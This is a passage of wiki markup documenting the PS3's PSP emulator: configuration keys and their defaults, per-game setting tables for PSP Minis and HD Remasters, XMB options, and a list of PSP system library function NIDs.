0 = (Default)<br /> |-<br /> | || DEPTH.0 = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || DEPTH.1 = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || FOCAL_DISTANCE = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || FIELD_WIDTH = %f || ||<br /> 0 = (Default)<br /> |-<br /> | } || || ||<br /> |-<br /> | BLOOM. {|| || || bloom filter<br /> |-<br /> | || THRESHOLD.R = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || THRESHOLD.G = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || THRESHOLD.B = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || THRESHOLD.VALUE = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || ADD.R = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || ADD.G = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || ADD.B = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || ADD.LOD = %f || ||<br /> 0 = (Default)<br /> |-<br /> | } || || ||<br /> |-<br /> | } || || ||<br /> |-<br /> | || ADDITIONAL_KEY_ASSIGN = %llx || ADDITIONAL_KEY_ASSIGN = 0000000047C6C544 ||<br /> 0000000047C6C544 : maps right analog stick, usefull for 3rd person camera viewing<br /> 0000000048C6C944 : maps L + R to right analog stick left and right<br /> 8000000000000000 : unknown<br /> |-<br /> | || SAVEDATA_USE_UPPERCASENAME = %lld || ||<br /> 0 = (Default)<br /> Ese = convert characters<br /> |-<br /> | || FAKE_PATH = %s || || (max. lenght 0x400 bytes)<br /> |-<br /> | || SAVEDATA_LOAD_CACHE_TARGET_NAME = %s || SAVEDATA_LOAD_CACHE_TARGET_NAME = ULJM05637DQUEST ||<br /> |-<br /> | || SAVEDATA_USE_PS3_SAVE = %lld || SAVEDATA_USE_PS3_SAVE = 1 ||<br /> 0 = Uses PSP/PSPMinis SaveData module <br /> 1 = SaveGame via PS3 SaveData module<br /> |-<br /> | || ICACHE_CONTROL = %llx || ||<br /> 0 = Enable InvalidateAll availability<br /> 1 = sceKernelIcacheInvalidateRange disabled?<br /> 2 = sceKernelIcacheInvalidateAll disabled?<br /> |-<br /> | || DEBUG.GRAPHICS = %lld || DEBUG.GRAPHICS = 1 ||<br /> 0 = off<br /> 1 = on , displays information and more: <br /> * flip time average (max.,min.),<br /> * RSX Performance average (max.,min.),<br /> * MIPS load average (max.,min.)<br /> 2 = ?<br /> |-<br /> | || DEBUG.CPU_PERF_BUF_SIZE = 0x%llx || ||<br /> 0x100000 = (default)<br /> |-<br /> | || VSYNC_OFFSET_US = %lld || VSYNC_OFFSET_US = 8341 ||<br /> 8341 = 0x2095 (Default)<br /> 2000 = 0x07D0 (Legend of Heroes/Eiyū Densetsu HD Remasters)<br /> |-<br /> | || ADHOC_PARTY = %llx || ADHOC_PARTY = 1 ||<br /> 0 = Disabled (Default)<br /> 1 = Enable Ad hoc Multiplayer<br /> |-<br /> | || GPI = 0x%llx || ||<br /> 0 = (Default) <br /> uint8_t value<br /> |-<br /> | || UTILITY_CTRL_VALUE = %llx || ||<br /> |-<br /> | || CODE_SIZE_LIMIT = %llx || CODE_SIZE_LIMIT = 00800000 ||<br /> |-<br /> | || NP.COMMUNICATION_ID = %s || ||<br /> |-<br /> | || ADHOC_LOCAL_PEER_NUM = %llx || ||<br /> |-<br /> | ADHOC. {|| || || <br /> |-<br /> | || EMUPA_TITLE_ID = %s || ADHOC.EMUPA_TITLE_ID = ULJM05637 ||<br /> |-<br /> | || EMUPA_INITIAL_SERVER = %lld || ADHOC.EMUPA_INITIAL_SERVER = 1 ||<br /> 0 = (Default) <br /> 1 = <br /> |-<br /> | || USE_WORLD_MIN = %lld || ||<br /> |-<br /> | || USE_WORLD_MAX = %lld || ||<br /> |-<br /> | || MAC_THREAD_PRIORITY = %lld || ||<br /> |-<br /> | || SEND_LIMIT = %lld || ||<br /> |-<br /> | || RECV_LIMIT = %lld || ||<br /> |-<br /> | || PTP_SB_SEND_EXT = %lld || ||<br /> |-<br /> | || PTP_SEND_INTERVAL_MIN = %lld || ||<br /> |-<br /> | || PTP_ACCEPT_DELAY = %lld || ||<br /> |-<br /> | || FLAGS = %llx || ||<br /> |-<br /> | } || || ||<br /> |-<br /> |}<br /> <br /> === Special notes ===<br /> <br /> ==== PSP Minis ====<br /> On few Games there are predefined changes set for the Core within the emulator.<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Title ID !! Title Name !! Note<br /> |-<br /> | NPEZ00001 || Puzzle Scape Mini || AW.DISCARD_EDGE = 20000&lt;br&gt; AW.DECODE_WAIT = 10000<br /> |-<br /> | NPEZ00002 || Stand O'Food || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00003 || Mahjongg Artifacts Chapter 2 || AW.LINEAR_ADRS = 40&lt;br&gt; AW.DISABLE_FB_TEX = 100&lt;br&gt; AW.DISCARD_EDGE = 20000<br /> |-<br /> | NPEZ00021 || Pinball Dreams || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00022 || Pinball Fantasies || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00027 || Sudoku || AUDIO.SLEEP = 421<br /> |-<br /> | NPEZ00028 || Bowling 3D *1) || <br /> |-<br /> | NPEZ00031 || Hero Of Sparta || <br /> |-<br /> | NPEZ00041 || Blast Off || <br /> |-<br /> | NPEZ00046 || Brainpipe || <br /> |-<br /> | NPEZ00093 || Tetris *1) || AW.SINGLE_BUF = 80&lt;br&gt;AW.REUSE_ADRS = 110000<br /> |-<br /> | NPEZ00094 || Yummy Yummy Cooking Jam || AW.SINGLE_BUF = 880&lt;br&gt;AW.DECODE_WAIT = 10000<br /> |-<br /> | NPEZ00105 || Telegraph - Sudoku &amp; Kakuro || DRAWN_IMAGE_SCALE = 1 <br /> |-<br /> | NPEZ00106 || Sudoku und Kakuro: Welt Edition || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00107 || Spot The Differences! || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00108 || Finde die Unterschiede! Welt Edition || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00112 || Telegraph Crosswords || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00113 || Kreuzwortraetsel: Welt Edition || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPEZ00125 || Pallurikio || <br /> |-<br /> | NPEZ00194 || Mahjongg Artifacts || AW.LINEAR_ADRS = 40&lt;br&gt;AW.DISABLE_FB_TEX = 100&lt;br&gt;AW.DISCARD_EDGE = 20000<br /> |-<br /> | NPEZ00219 || Arctic Adventures: Polar's Puzzles || <br /> |-<br /> | NPEZ00381 || Fighting Fantasy - Talisman of death || AW.THR_PIXEL_OFST = 0<br /> |-<br /> | NEPZ00444 || Jetpack Joyride || AW.CLOAD_MODE = 1<br /> |-<br /> | NPUZ00002 || Bowling 3D *1) || <br /> |-<br /> | NPUZ00005 || Hero Of Sparta || <br /> |-<br /> | NPUZ00006 || Mahjongg Artifacts Chapter 2 || AW.LINEAR_ADRS = 40&lt;br&gt;AW.DISABLE_FB_TEX = 100&lt;br&gt;AW.DISCARD_EDGE = 20000<br /> |-<br /> | NPUZ00009 || Brainpipe || <br /> |-<br /> | NPUZ00017 || Pinball Fantasies || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPUZ00018 || Yummy Yummy Cooking Jam || AW.SINGLE_BUF = 880&lt;br&gt;AW.DECODE_WAIT = 10000<br /> |-<br /> | NPUZ00021 || Blast Off || <br /> |-<br /> | NPUZ00029 || Stand O' Food || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPUZ00034 || Spot The Differences! || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPUZ00054 || Pinball Dreams || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPUZ00058 || SuperMarket Mania || DRAWN_IMAGE_SCALE = 1<br /> |-<br /> | NPUZ00062 || Mahjongg Artifacts || AW.LINEAR_ADRS = 40&lt;br&gt;AW.DISABLE_FB_TEX = 100&lt;br&gt;AW.DISCARD_EDGE = 20000<br /> |-<br /> | NPUZ00099 || Pallurikio || <br /> |-<br /> | NPUZ00114 || Arctic Adventures: Polar's Puzzles || <br /> |-<br /> | NPUZ00292 || Jetpack Joyride || AW.CLOAD_MODE = 1<br /> |-<br /> |}<br /> <br /> *1) SFO: PP, officially wont run on ps3 as no iso.bin and no proper minis file (only psp officially supported)<br /> <br /> ==== PSP HD Remasters ====<br /> <br /> * TextureSize = 1024<br /> * Can use 64 MB memory<br /> And these PSP Remaster Games got a MINIS2.EDAT setting definitions for the Emulator Core.<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Disc Title ID !! NP Title ID !! Title Name !! Note<br /> |-<br /> | BLJM85001 || NPJB40001 || Monster Hunter Portable 3rd HD Ver || VERSION = 0xFFFFFFFF&lt;br&gt;<br /> S3D.ENABLE = 2&lt;br&gt;<br /> SDRAM_SIZE = 02800000&lt;br&gt;<br /> MIPS_CODE_BLOCK_SIZE = 8192&lt;br&gt; (next settings are done internally and not part of MINIS2)&lt;br&gt;<br /> DRAWN_IMAGE_SCALE = 4&lt;br&gt;<br /> AW.EXT_MODE = 3&lt;br&gt;<br /> TRANS_CACHE_SIZE = 1000000&lt;br&gt;<br /> VSYNC_OFFSET_US = 2000&lt;br&gt;<br /> ADHOC.EMUPA_TITLE_ID = ULJM05800&lt;br&gt;<br /> ADHOC.EMUPA_INITIAL_SERVER = 1&lt;br&gt;<br /> ADHOC_PARTY = 1&lt;br&gt;<br /> |-<br /> | BLJM85002 || NPJB40002 || K-ON Houkago Live HD Ver || VERSION = 0xFFFFFFFF&lt;br&gt;<br /> AW.EXT_MODE = 3&lt;br&gt;<br /> AW.EXT_CMD = 2&lt;br&gt;<br /> SDRAM_SIZE = 02800000&lt;br&gt;<br /> ADDITIONAL_KEY_ASSIGN = 8000000000000000&lt;br&gt;<br /> S3D.ENABLE = 1&lt;br&gt;<br /> ADHOC.EMUPA_TITLE_ID = ULJM05709<br /> |-<br /> | BLJM85003 || NPJB40003 || Shin Sangoku Musou Multi Raid 2 HD Ver || VERSION = 0xFFFFFFFF&lt;br&gt;<br /> AW.EXT_MODE = 3&lt;br&gt;<br /> AW.EXT_CMD = 2&lt;br&gt;<br /> SDRAM_SIZE = 02800000&lt;br&gt;<br /> ADDITIONAL_KEY_ASSIGN = 0000000047C6C544&lt;br&gt;<br /> S3D.ENABLE = 1&lt;br&gt;<br /> ADHOC.EMUPA_TITLE_ID = ULJM05637&lt;br&gt;<br /> AW.VRAM_MODE = 1&lt;br&gt;<br /> SAVEDATA_LOAD_CACHE_TARGET_NAME = ULJM05637DQUEST<br /> |-<br /> | BLJM85004 || NPJB00293&lt;br&gt;NPJN00005 ||Eiyuu Densetsu Sora no Kiseki FC Kai HD Edition || VERSION = 0xFFFFFFFF&lt;br&gt;<br /> SDRAM_SIZE = 03000000&lt;br&gt;<br /> ADDITIONAL_KEY_ASSIGN = 0000000047C6C544&lt;br&gt;<br /> S3D.ENABLE = 1&lt;br&gt;<br /> AW.EXT_MODE = 3&lt;br&gt;<br /> AW.EXT_CMD = 3&lt;br&gt;<br /> ADHOC_PARTY = 0&lt;br&gt;<br /> VSYNC_OFFSET_US = 2000<br /> |-<br /> | BLJM85005 || NPJB00334&lt;br&gt;NPJN00007||Eiyuu Densetsu: Sora no Kiseki SC Kai HD Edition || VERSION = 0xFFFFFFFF&lt;br&gt;<br /> SDRAM_SIZE = 04000000&lt;br&gt;<br /> CODE_SIZE_LIMIT = 00800000&lt;br&gt;<br /> ADDITIONAL_KEY_ASSIGN = 8000000000000000&lt;br&gt;<br /> S3D.ENABLE = 2&lt;br&gt;<br /> AW.EXT_MODE = 3&lt;br&gt;<br /> AW.EXT_CMD = 3&lt;br&gt;<br /> ADHOC_PARTY = 0&lt;br&gt;<br /> VSYNC_OFFSET_US = 2000<br /> |-<br /> | BLJM85006 || NPJB00360&lt;br&gt;NPJN00008||Eiyuu Densetsu: Sora no Kiseki the 3rd: Kai HD Edition || VERSION = 0xFFFFFFFF&lt;br&gt;<br /> SDRAM_SIZE = 04000000&lt;br&gt;<br /> CODE_SIZE_LIMIT = 00800000&lt;br&gt;<br /> ADDITIONAL_KEY_ASSIGN = 8000000000000000&lt;br&gt;<br /> S3D.ENABLE = 2&lt;br&gt;<br /> AW.EXT_MODE = 3&lt;br&gt;<br /> AW.EXT_CMD = 3&lt;br&gt;<br /> ADHOC_PARTY = 0&lt;br&gt;<br /> |}<br /> <br /> DiscIDs inside emulator: http://pastie.org/pastes/4367964/<br /> <br /> ==== Unofficial PSP Games MINIS2====<br /> <br /> * research only<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Title ID !! Title Name !! Issue !! Setting !! Note<br /> |-<br /> | || Shin Megami Tensei: Persona3 Portable || hangs while loading screen ||<br /> AW.VRAM = 1<br /> || fixes loading, but requires further research<br /> |-<br /> | || Silent Hill: Origins || Loading Screen texture flicker on top ||<br /> AW.LINEAR_ADRS = 40 <br /> ||<br /> |-<br /> | || Tactics Ogre: Let Us Cling Together || Black texture? overlay in movies and &quot;Tarot Card&quot; selection ||<br /> AW.LINEAR_ADRS = 40 <br /> ||<br /> |-<br /> | || The 3rd Birthday || blue transparent texture overblending ||<br /> AW.DISABLE_FB_TEX = 222<br /> || mostly removed, but requires further research<br /> |-<br /> |}<br /> <br /> === XMB Settings ===<br /> <br /> Options added to XMB on Game Settings. Options can be set individually. <br /> <br /> &lt;!--//<br /> may be here also the values used on xregistry, not sure if it s good idea to disturb the xregistry page<br /> //--&gt;<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! XMB Settings!! Values &amp; Description !! Remarks !! [[XRegistry.sys]]<br /> |-<br /> | PSP Remaster - Screen Mode || Sets the display size of the screen during gameplay. This setting can only be used when outputting video to an HD TV.&lt;ul&gt;&lt;li&gt;Normal &lt;/li&gt;&lt;li&gt;Full Screen || The equivalent option for ps/ps2 games, PS/PS2 Upscaling, works on SDTV. || -<br /> |-<br /> | PSP Remaster - 3D Display || Sets whether or not to display Images in 3D.You can also adjust the depth of 3D images. This setting can only used when playing a stereoscopic 3D game using a 3D TV.&lt;ul&gt;&lt;li&gt;Off &lt;/li&gt;&lt;li&gt;On : &lt;ul&gt;&lt;/li&gt;&lt;li&gt;7 (Strong) &lt;/li&gt;&lt;li&gt;6 &lt;/li&gt;&lt;li&gt;5 (Normal) &lt;/li&gt;&lt;li&gt;4 &lt;/li&gt;&lt;li&gt;3 &lt;/li&gt;&lt;li&gt;2 &lt;/li&gt;&lt;li&gt;1 (Weak) || - || -<br /> |-<br /> | PSP Remaster - Ad Hoc Mode Channel || Set a channel for use in ad hoc mode. Choose the same channel as the person you want to connect with.&lt;ul&gt;&lt;li&gt;Automatic &lt;/li&gt;&lt;li&gt;1 &lt;/li&gt;&lt;li&gt;6 &lt;/li&gt;&lt;li&gt;11 || - || -<br /> |-<br /> | PSP Remaster - Ad Hoc Mode || Sets whether or not to use ad hoc mode over a wireless LAN.&lt;ul&gt;&lt;li&gt;Off &lt;/li&gt;&lt;li&gt;On || - || -<br /> |-<br /> | &quot;PSP EMU&quot; Menu || Enable/disable the options on XMB described above.&lt;ul&gt;&lt;li&gt;Off &lt;/li&gt;&lt;li&gt;On || &lt;!--//this settings is not on the table of debug settings because was added recently 3.70? , name should be double crossed//--&gt; See [[QA_Flagging#Debug_Settings_.28CEX.2FDEX.29 | debug settings]] || -<br /> |-<br /> |}<br /> <br /> === NID ===<br /> &lt;pre&gt;<br /> <br /> Library: GprofManStub<br /> 0x6A05A80D sceGprofSetProfil<br /> 0x799D0A67 sceGprofFreeProfil<br /> <br /> Library: GprofManWeak<br /> 0x6A05A80D sceGprofSetProfil_Weak<br /> 0x799D0A67 sceGprofFreeProfil_Weak<br /> <br /> Library: InterruptManager<br /> 0x5CB5A78B sceKernelSuspendSubIntr<br /> 0x7860E0DC sceKernelResumeSubIntr<br /> 0x8A389411 sceKernelDisableSubIntr<br /> 0xCA04A2B9 sceKernelRegisterSubIntrHandler<br /> 0xD61E6961 sceKernelReleaseSubIntrHandler<br /> 0xEEE43F47 sceKernelRegisterUserSpaceIntrStack<br /> 0xFB8E22EC sceKernelEnableSubIntr<br /> 0xFC4374B8 sceKernelIsSubInterruptOccurred<br /> <br /> Library: IoFileMgrForUser<br /> 0x06A70004 sceIoMkdir<br /> 0x08BD7374 sceIoGetDevType<br /> 0x0FACAB19 sceIoWriteAsync<br /> 0x109F50BC sceIoOpen<br /> 0x1117C65F sceIoRmdir<br /> 0x1B385D8F sceIoLseek32Async<br /> 0x27EB27B8 sceIoLseek<br /> 0x3251EA56 sceIoPollAsync<br /> 0x35DBD746 sceIoWaitAsyncCB<br /> 0x42EC03AC sceIoWrite<br /> 0x54F5FB11 sceIoDevctl<br /> 0x55F4717D sceIoChdir<br /> 0x5C2BE2CC sceIoGetFdList<br /> 0x63632449 sceIoIoctl<br /> 0x68963324 sceIoLseek32<br /> 0x6A638D83 sceIoRead<br /> 0x6D08A871 sceIoUnassign<br /> 0x71B19E77 sceIoLseekAsync<br /> 0x779103A0 sceIoRename<br /> 0x810C4BC3 sceIoClose<br /> 0x89AA9906 sceIoOpenAsync<br /> 0xA0B5A7C2 sceIoReadAsync<br /> 0xA12A0514 sceIoSetAsyncCallback<br /> 0xAB96437F sceIoSync<br /> 0xACE946E8 sceIoGetstat<br /> 0xB293727F sceIoChangeAsyncPriority<br /> 0xB29DDF9C sceIoDopen<br /> 0xB2A628C1 sceIoAssign<br /> 0xB8A740F4 sceIoChstat<br /> 0xCB05F8D6 sceIoGetAsyncStat<br /> 0xE23EEC33 sceIoWaitAsync<br /> 0xE3EB004C sceIoDread<br /> 0xE8BC6571 sceIoCancel<br /> 0xE95A012B sceIoIoctlAsync<br /> 0xEB092469 sceIoDclose<br /> 0xF27A9C51 sceIoRemove<br /> 0xFF5940B6 sceIoCloseAsync<br /> <br /> Library: Kernel_Library<br /> 0x092968F4 sceKernelCpuSuspendIntr<br /> 0x15B6446B sceKernelUnlockLwMutex<br /> 0x1839852A sceKernelMemcpy<br /> 0x1FC64E09 sceKernelLockLwMutexCB<br /> 0x293B45B8 sceKernelGetThreadId_kernel<br /> 0x37431849 sceKernelTryLockLwMutex_600<br /> 0x3B84732D sceKernelCpuResumeIntrWithSync<br /> 0x47A0B729 sceKernelIsCpuIntrSuspended<br /> 0x5F10D406 sceKernelCpuResumeIntr<br /> 0xA089ECA4 sceKernelMemset<br /> 0xB55249D2 sceKernelIsCpuIntrEnable<br /> 0xBEA46419 sceKernelLockLwMutex<br /> 0xC1734599 sceKernelReferLwMutexStatus<br /> 0xD13BDE95 sceKernelCheckThreadStack_user<br /> 0xDC692EE3 sceKernelTryLockLwMutex<br /> 0xFA835CDE sceKernelGetTlsAddr<br /> <br /> Library: LoadExecForUser<br /> 0x05572A5F sceKernelExitGame<br /> 0x2AC9954B sceKernelExitGameWithStatus<br /> 0x362A956B sceKernelSafetyCheck1<br /> 0x4AC57943 sceKernelRegisterExitCallback<br /> 0x8ADA38D3 sceKernelLoadExecNpDrm<br /> 0xBD2F1094 sceKernelLoadExec<br /> <br /> Library: ModuleMgrForUser<br /> 0x2E0911AA sceKernelUnloadModule<br /> 0x50F0C1EC sceKernelStartModule<br /> 0x644395E2 sceKernelGetModuleIdList<br /> 0x748CBED9 sceKernelQueryModuleInfo<br /> 0x8F2DF740 sceKernelStopUnloadSelfModuleWithStatus<br /> 0x977DE386 sceKernelLoadModule<br /> 0xB7F46618 sceKernelLoadModuleByID<br /> 0xCC1D3699 sceKernelStopUnloadSelfModule<br /> 0xCDE1C1FE sceKernelCheckTextSegment<br /> 0xD1FF982A sceKernelStopModule<br /> 0xD2FBC957 sceKernelGetModuleGPByAddress<br /> 0xD675EBB8 sceKernelSelfStopUnloadModule<br /> 0xD8B73127 sceKernelGetModuleIdByAddress<br /> 0xE4C4211C sceKernelLoadModuleWithBlockOffset<br /> 0xF0A26395 sceKernelGetModuleId<br /> 0xF2D8D1B4 sceKernelLoadModuleNpDrm<br /> 0xF9275D98 sceKernelLoadModuleBufferUsbWlan<br /> 0xFBE27467 sceKernelLoadModuleByIDWithBlockOffset<br /> 0xFEF27DC1 sceKernelLoadModuleDNAS<br /> <br /> Library: StdioForUser<br /> 0x0CBB0571 sceKernelStdioLseek<br /> 0x172D316E sceKernelStdin<br /> 0x3054D478 sceKernelStdioRead<br /> 0x432D8F5C sceKernelRegisterStdoutPipe<br /> 0x6F797E03 sceKernelRegisterStderrPipe<br /> 0x924ABA61 sceKernelStdioOpen<br /> 0x9D061C19 sceKernelStdioClose<br /> 0xA3B931DB sceKernelStdioWrite<br /> 0xA46785C9 sceKernelStdioSendChar<br /> 0xA6BAB2E9 sceKernelStdout<br /> 0xF78BA90A sceKernelStderr<br /> <br /> Library: SysMemUserForUser<br /> 0x13A5ABEF sceKernelPrintf<br /> 0x1B4217BC sceKernelSetCompiledSdkVersion630<br /> 0x237DBD4F sceKernelAllocPartitionMemory<br /> 0x315AD3A0 sceKernelSetCompiledSdkVersion380_390<br /> 0x342061E5 sceKernelSetCompiledSdkVersion370<br /> 0x35669D4C sceKernelSetCompiledSdkVersion600_620<br /> 0x358CA1BB sceKernelSetCompiledSdkVersion660<br /> 0x50F61D8A sceKernelFreeMemoryBlock<br /> 0x7591C7DB sceKernelSetCompiledSdkVersion100<br /> 0x7893F79A sceKernelSetCompiledSdkVersion570_570<br /> 0x91DE343C sceKernelSetCompiledSdkVersion500_550<br /> 0x9D9A5BA1 sceKernelGetBlockHeadAddr<br /> 0xA291F107 sceKernelMaxFreeMemSize<br /> 0xB6D61D02 sceKernelFreePartitionMemory<br /> 0xD8DE5C1E sceKernelSafetyCheck0<br /> 0xDB83A952 sceKernelGetMemoryBlockAddr<br /> 0xEBD5C3E6 sceKernelSetCompiledSdkVersion395_405<br /> 0xF77D77CB sceKernelSetCompilerVersion<br /> 0xF919F628 sceKernelTotalFreeMemSize<br /> 0xFC114573 sceKernelGetCompiledSdkVersion<br /> 0xFE707FDF sceKernelAllocMemoryBlock<br /> <br /> Library: ThreadManForUser<br /> 0x034A921F sceKernelGetVTimerTime<br /> 0x0C106E53 sceKernelRegisterThreadEventHandler<br /> 0x0D81716A sceKernelPollMbx<br /> 0x0DDCD2C9 sceKernelTryLockMutex<br /> 0x110DEC9A sceKernelUSec2SysClock<br /> 0x1181E963 sceKernelDelaySysClockThreadCB<br /> 0x17C1684E sceKernelReferThreadStatus<br /> 0x18260574 sceKernelReceiveMbx<br /> 0x19CFF145 sceKernelCreateLwMutex<br /> 0x1AF94D03 sceKernelDonateWakeupThread<br /> 0x1D371B8A sceKernelCancelVpl<br /> 0x1FB15A32 sceKernelSetEventFlag<br /> 0x20FFF560 sceKernelCreateVTimer<br /> 0x278C0DF5 sceKernelWaitThreadEnd<br /> 0x27E22EC2 sceKernelResumeDispatchThread<br /> 0x28B6489C sceKernelDeleteSema<br /> 0x293B45B8 sceKernelGetThreadId<br /> 0x2A3D44FF sceKernelGetCallbackCount<br /> 0x2C34E053 sceKernelReleaseWaitThread<br /> 0x30FD48F0 sceKernelPollEventFlag<br /> 0x328C546A sceKernelWaitEventFlagCB<br /> 0x328F9E52 sceKernelDeleteVTimer<br /> 0x32BF938E sceKernelDeleteTlspl<br /> 0x33BE4024 sceKernelReferMsgPipeStatus<br /> 0x349B864D sceKernelCancelMsgPipe<br /> 0x349D6D6C sceKernelCheckCallback<br /> 0x369ED59D sceKernelGetSystemTimeLow<br /> 0x369EEB6B sceKernelReferThreadEventHandlerStatus<br /> 0x383F7BCC sceKernelTerminateDeleteThread<br /> 0x39810265 sceKernelReferVplStatus<br /> 0x3AD58B8C sceKernelSuspendDispatchThread<br /> 0x3B183E26 sceKernelGetThreadExitStatus<br /> 0x3F53E640 sceKernelSignalSema<br /> 0x402FCF22 sceKernelWaitEventFlag<br /> 0x446D8DE6 sceKernelCreateThread<br /> 0x4A719FB2 sceKernelFreeTlspl<br /> 0x4C145944 sceKernelReferLwMutexStatusByID<br /> 0x4E3A1105 sceKernelWaitSema<br /> 0x52089CA1 sceKernelGetThreadStackFreeSize<br /> 0x532A522E _sceKernelExitThread<br /> 0x53B00E9A sceKernelSetVTimerHandlerWide<br /> 0x542AD630 sceKernelSetVTimerTime<br /> 0x55C20A00 sceKernelCreateEventFlag<br /> 0x56C039B5 sceKernelCreateVpl<br /> 0x57CF62DD sceKernelGetThreadmanIdType<br /> 0x58B1F937 sceKernelPollSema<br /> 0x5BF4DD27 sceKernelLockMutexCB<br /> 0x5F32BEAA sceKernelReferVTimerStatus<br /> 0x60107536 sceKernelDeleteLwMutex<br /> 0x616403BA sceKernelTerminateThread<br /> 0x623AE665 sceKernelTryAllocateFpl<br /> 0x627E6F3A sceKernelReferSystemStatus<br /> 0x64D4540E sceKernelReferThreadProfiler<br /> 0x65F54FFB _sceKernelAllocateTlspl<br /> 0x6652B8CA sceKernelSetAlarm<br /> 0x68DA9E36 sceKernelDelayThreadCB<br /> 0x6B30100F sceKernelUnlockMutex<br /> 0x6D212BAC sceKernelWaitSemaCB<br /> 0x6E9EA350 _sceKernelReturnFromCallback<br /> 0x71BC9871 sceKernelChangeThreadPriority<br /> 0x721067F3 sceKernelReferTlsplStatus<br /> 0x72F3C145 sceKernelReleaseThreadEventHandler<br /> 0x730ED8BC sceKernelReferCallbackStatus<br /> 0x74829B76 sceKernelReceiveMsgPipe<br /> 0x75156E8F sceKernelResumeThread<br /> 0x7C0DC2A0 sceKernelCreateMsgPipe<br /> 0x7C41F2C2 sceKernelSendMsgPipeCB<br /> 0x7E65B999 sceKernelCancelAlarm<br /> 0x809CE29B sceKernelExitDeleteThread<br /> 0x812346E4 sceKernelClearEventFlag<br /> 0x8125221D sceKernelCreateMbx<br /> 0x8218B4DD sceKernelReferGlobalProfiler<br /> 0x82826F70 sceKernelSleepThreadCB<br /> 0x82BC5777 sceKernelGetSystemTimeWide<br /> 0x840E8133 sceKernelWaitThreadEndCB<br /> 0x86255ADA sceKernelDeleteMbx<br /> 0x876DBFAD sceKernelSendMsgPipe<br /> 0x87D4DD36 sceKernelCancelReceiveMbx<br /> 0x87D9223C sceKernelCancelMutex<br /> 0x884C9F90 sceKernelTrySendMsgPipe<br /> 0x89B3D48C sceKernelDeleteVpl<br /> 0x8DAFF657 sceKernelCreateTlspl<br /> 0x8FFDF9A2 sceKernelCancelSema<br /> 0x912354A7 sceKernelRotateThreadReadyQueue<br /> 0x94416130 sceKernelGetThreadmanIdList<br /> 0x94AA61EE sceKernelGetThreadCurrentPriority<br /> 0x9944F31F sceKernelSuspendThread<br /> 0x9ACE131E sceKernelSleepThread<br /> 0x9FA03CD3 sceKernelDeleteThread<br /> 0xA1F78052 _sceKernelReturnFromChangeStack<br /> 0xA66B0120 sceKernelReferEventFlagStatus<br /> 0xA8AA591F sceKernelCancelFpl<br /> 0xA8E8C846 sceKernelReferMbxStatus<br /> 0xA9C2CB9A sceKernelReferMutexStatus<br /> 0xAA73C935 sceKernelExitThread<br /> 0xAF36D708 sceKernelTryAllocateVpl<br /> 0xB011B11F sceKernelLockMutex<br /> 0xB2C25152 sceKernelSetSysClockAlarm<br /> 0xB3A59970 sceKernelGetVTimerBase<br /> 0xB736E9FF sceKernelFreeVpl<br /> 0xB7C18B77 sceKernelGetVTimerBaseWide<br /> 0xB7D098C6 sceKernelCreateMutex<br /> 0xBA4051D6 sceKernelCancelCallback<br /> 0xBA6B92E2 sceKernelSysClock2USec<br /> 0xBC6FEBC5 sceKernelReferSemaStatus<br /> 0xBC80EC7C sceKernelExtendThreadStack<br /> 0xBD123D9E sceKernelDelaySysClockThread<br /> 0xBED27435 sceKernelAllocateVpl<br /> 0xC07BB470 sceKernelCreateFpl<br /> 0xC0B3FFD2 sceKernelGetVTimerTimeWide<br /> 0xC11BA8C4 sceKernelNotifyCallback<br /> 0xC68D9437 sceKernelStartVTimer<br /> 0xC8CD158C sceKernelUSec2SysClockWide<br /> 0xCD203292 sceKernelCancelEventFlag<br /> 0xCEADEB47 sceKernelDelayThread<br /> 0xD0AEEE87 sceKernelStopVTimer<br /> 0xD13BDE95 sceKernelCheckThreadStack<br /> 0xD2D615EF sceKernelCancelVTimerHandler<br /> 0xD59EAD2F sceKernelWakeupThread<br /> 0xD6DA4BA1 sceKernelCreateSema<br /> 0xD8199E4C sceKernelReferFplStatus<br /> 0xD8B299AE sceKernelSetVTimerHandler<br /> 0xD979E9BF sceKernelAllocateFpl<br /> 0xDAA3F564 sceKernelReferAlarmStatus<br /> 0xDB738F35 sceKernelGetSystemTime<br /> 0xDF52098F sceKernelTryReceiveMsgPipe<br /> 0xE1619D7C sceKernelSysClock2USecWide<br /> 0xE7282CB6 sceKernelAllocateFplCB<br /> 0xE81CAF8F sceKernelCreateCallback<br /> 0xE9B3061E sceKernelSendMbx<br /> 0xEA748E31 sceKernelChangeCurrentThreadAttr<br /> 0xEC0A693F sceKernelAllocateVplCB<br /> 0xED1410E0 sceKernelDeleteFpl<br /> 0xEDBA5844 sceKernelDeleteCallback<br /> 0xEF9E4C70 sceKernelDeleteEventFlag<br /> 0xF0B7DA1C sceKernelDeleteMsgPipe<br /> 0xF3986382 sceKernelReceiveMbxCB<br /> 0xF475845D sceKernelStartThread<br /> 0xF6414A71 sceKernelFreeFpl<br /> 0xF8170FBE sceKernelDeleteMutex<br /> 0xFB6425C3 sceKernelSetVTimerTimeWide<br /> 0xFBFA697D sceKernelReceiveMsgPipeCB<br /> 0xFCCFAD26 sceKernelCancelWakeupThread<br /> 